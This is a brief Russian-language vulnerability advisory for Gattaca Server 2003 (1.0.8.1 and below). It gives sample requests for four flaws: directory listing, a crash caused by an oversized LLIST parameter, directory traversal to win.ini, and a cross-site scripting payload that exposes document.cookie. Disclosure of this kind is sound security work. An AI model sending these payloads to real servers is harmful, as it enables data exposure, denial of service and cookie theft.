Уязвимые версии: Gattaca Server 2003
1.0.8.1
и ниже. Платформа: Windows NT. Уязвимости:

  • при подаче запроса GET с 2 слешами («//»), сервер раскрывает содержимое каталогов (пример запроса:
    http://[target]//); 
  • если передать команде сервера LLIST параметр в 1048 байт, сервер «падает» ($> LLIST
    AAAA…[1024]…AAAA); 
  • обход директорий:
    http://[target]/view.tmpl?testfile=../../winnt/win.ini
  • межсайтовй скриптинг: http://[target]/view2.tmpl?text= <script>alert(«Cookie=»+document.cookie)</script>



Оставить мнение